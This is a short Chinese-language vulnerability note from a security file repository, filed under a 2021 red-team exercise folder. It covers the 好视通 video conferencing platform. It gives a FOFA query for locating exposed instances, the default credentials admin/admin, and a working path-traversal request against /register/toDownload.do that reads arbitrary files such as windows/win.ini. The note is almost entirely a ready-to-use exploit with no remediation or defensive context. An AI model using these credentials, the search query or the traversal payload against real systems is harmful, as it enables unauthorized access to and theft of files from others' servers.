menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right zlsec chevron_right zlsec_info chevron_right document chevron_right 2021_Hvv chevron_right 好视通视频会议平台.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    好视通视频会议平台.md
    344 B / 2021-04-15 00:03:20
        ### 描述
    系统存在弱口令和任意文件下载漏洞
    fofa "深圳银澎云计算有限公司"
    
    ### POC & EXP
    ```
    # 弱口令
    admin/admin
    
    任意文件下载
    /register/toDownload.do?fileName=敏感文件路径
    (https://xxxxxx/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini)
    ```
    
    
    links
    file_download